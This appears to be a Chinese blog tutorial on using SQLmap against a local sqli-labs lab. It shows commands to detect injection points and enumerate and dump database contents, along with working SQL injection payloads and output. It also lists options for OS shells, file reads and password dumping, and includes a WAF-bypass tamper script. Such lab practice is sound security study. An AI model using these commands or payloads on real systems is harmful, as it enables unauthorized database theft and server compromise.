《Web安全攻防》使用sqli-labs来熟悉一下SQLmap这个神器,我也大致的熟悉一下这个工具的使用吧。
SQL注入的基本步骤:
- 判断注入类型
- 获取数据库名
- 获取数据表名
- 获取字段名
- 获取数据
1 判断注入类型
1.1 Get类型
使用 -u 参数指定url(sqlmap关卡1)
sqlmap -u "http://localhost:4000/Less-1?id=1"
需要注意的是:URL最好附带请求的参数。
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind(布尔盲注)
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9623=9623 AND 'JjhO'='JjhO
Type: error-based(报错注入)
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1' AND GTID_SUBSET(CONCAT(0x71767a7871,(SELECT (ELT(3702=3702,1))),0x716a6b6271),3702) AND 'oyIr'='oyIr
Type: time-based blind(延时注入)
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))etaK) AND 'ACHt'='ACHt
Type: UNION query(联合注入)
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9510' UNION ALL SELECT NULL,CONCAT(0x71767a7871,0x65497456414974586b4c4a676479645971685666684c6163637353757955774841706b47726a6755,0x716a6b6271),NULL-- -
---
上面提到了参数id可以使用4种注入技术(布尔、报错、延时、联合),还给出了所使用的Payload(有效载荷)。SQLmap采用5种SQL注入技术:
- 联合注入
- 报错注入
- 布尔盲注
- 延时注入
- 堆叠注入
如果不太熟悉这些注入类型,可以去sqli-labs做一下,可以参考我前面的这篇文章:https://blog.csdn.net/qq_43085611/article/details/112661431。
1.2 POST或GET类型
使用 Burp Suite 抓包(需要抓包的网页是个本地搭建的网址, 一般会通过localhost 或者 127.0.0.1 访问,但是如果通过这俩个地址的话 Burp Suite 是抓不到包的,可以考虑修改 host 的方法来使用其他域名访问),最后将抓到的包保存到本地为 1.txt 文件。
然后使用 -r 参数来指定HTTP包( -r REQUESTFILE Load HTTP request from a file)
sqlmap -r 1.txt
这种方式可以检测出GET类型或者POST类型的注入漏洞。
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2269=2269 AND 'fYWA'='fYWA
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1' AND GTID_SUBSET(CONCAT(0x716b6a7671,(SELECT (ELT(8383=8383,1))),0x7176786a71),8383) AND 'THdq'='THdq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1253 FROM (SELECT(SLEEP(5)))PKdp) AND 'yWGz'='yWGz
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8764' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x766e654f656c6f7779676842616d704f53567a74486b645956614a4b527578794d6f44544775644b,0x7176786a71)-- -
如果仔细看SQLmap给出的提示信息,可以看到他已经将运行结果进行保存
[16:00:42] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:00:42] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'(运行结果保存地址)
[*] ending @ 16:00:42 /2021-01-26/
2 获取数据库名
使用命令
sqlmap -r 1.txt --dbs
数据库信息
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:05:51] [INFO] fetching database names
[16:05:51] [WARNING] reflective value(s) found and filtering out
[16:05:51] [INFO] retrieved: 'mysql'
[16:05:51] [INFO] retrieved: 'information_schema'
[16:05:51] [INFO] retrieved: 'performance_schema'
[16:05:51] [INFO] retrieved: 'sys'
[16:05:51] [INFO] retrieved: 'study'
[16:05:51] [INFO] retrieved: 'hello_ssm'
[16:05:51] [INFO] retrieved: 'dvwa'
[16:05:51] [INFO] retrieved: 'security'
[16:05:51] [INFO] retrieved: 'challenges'
available databases [9]:
[*] challenges
[*] dvwa
[*] hello_ssm
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] study
[*] sys
3 获取数据表名
使用命令
sqlmap -r 1.txt --tables
这个命令会列出系统中所有的表名,不经常使用。
常用的获取数据表名的命令
sqlmap -r 1.txt -D="security" --tables
使用-D指定数据库名,获取特定数据库的数据表名。执行结果如下:
[16:09:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:09:23] [INFO] fetching tables for database: 'security'
[16:09:23] [WARNING] reflective value(s) found and filtering out
[16:09:23] [INFO] retrieved: 'emails'
[16:09:23] [INFO] retrieved: 'referers'
[16:09:23] [INFO] retrieved: 'uagents'
[16:09:23] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
[16:09:23] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'
[*] ending @ 16:09:23 /2021-01-26/
4 获取字段名
类似上面获取表名的方法,我们最好指定一个数据表名
sqlmap -r 1.txt -D="security" -T emails --columns
指定参数除了可以采用 -D="security" 的方式,还可以采用 -T email 的方式。
执行结果如下:
[16:13:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:13:59] [INFO] fetching columns for table 'emails' in database 'security'
[16:14:00] [WARNING] reflective value(s) found and filtering out
[16:14:00] [INFO] retrieved: 'id','int'
[16:14:00] [INFO] retrieved: 'email_id','varchar(30)'
Database: security
Table: emails
[2 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email_id | varchar(30) |
| id | int |
+----------+-------------+
[16:14:00] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'
[*] ending @ 16:14:00 /2021-01-26/
5 获取数据
使用的命令为:
sqlmap -r 1.txt -D "security" -T emails -C email_id,id --dump
执行结果如下:
[16:17:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:17:19] [INFO] fetching entries of column(s) 'email_id, id' for table 'emails' in database 'security'
[16:17:19] [WARNING] reflective value(s) found and filtering out
[16:17:19] [INFO] retrieved: '[email protected]','1'
[16:17:19] [INFO] retrieved: '[email protected]','2'
[16:17:19] [INFO] retrieved: '[email protected]','3'
[16:17:19] [INFO] retrieved: '[email protected]','4'
[16:17:19] [INFO] retrieved: '[email protected]','5'
[16:17:19] [INFO] retrieved: '[email protected]','6'
[16:17:19] [INFO] retrieved: '[email protected]','7'
[16:17:19] [INFO] retrieved: '[email protected]','8'
Database: security
Table: emails
[8 entries]
+------------------------+----+
| email_id | id |
+------------------------+----+
| [email protected] | 1 |
| [email protected] | 2 |
| [email protected] | 3 |
| [email protected] | 4 |
| [email protected] | 5 |
| [email protected] | 6 |
| [email protected] | 7 |
| [email protected] | 8 |
+------------------------+----+
[16:17:19] [INFO] table 'security.emails' dumped to CSV file '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top/dump/security/emails.csv'(数据表)
[16:17:19] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'
[*] ending @ 16:17:19 /2021-01-26/
获取到的数据将会保存到csv文件中。
6 其他参数
配置
- –level n:其中n为1~5,代表不同的探测等级(等级越高,就会测试越全面,但是也会发送更多的请求。默认为1)
- –referer:设置referer来进行欺骗。
- –sql-shel:运行自定义的SQL语句
- –os-cmd或–os-shell:执行系统命令
- –file-read:读取系统文件
- –file-write或–file-dest:文件写入
- –tamper 模块名:指定绕过WAF/IDS/IPS的脚本
信息收集
- –users:所有用户
- –passwords:用户的密码
- –curent-db:当前数据库名
- –curent-user:当前的用户名
- –is-dba:当前用户是否为管理员
- –roles:列出管理员
7 Tamper
tamper通常用于绕过WAF。用一个简单的base64encode分析一下吧。
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Base64-encodes all characters in a given payload
>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
"""
return encodeBase64(payload, binary=False) if payload else payload
tamper主要就是在发送前进行一次转换,比如:有些网站在发送前会进行Base64加密,服务器接收到数据后进行base64解密。如果没有使用tamper,直接使用sqlmap则发送的是明文,在服务器base64解密后肯定无法进行注入。
通常都需要具体分析网站发送数据的方式来编写tamper脚本。使用方法:--tamper 模块名(文件名)。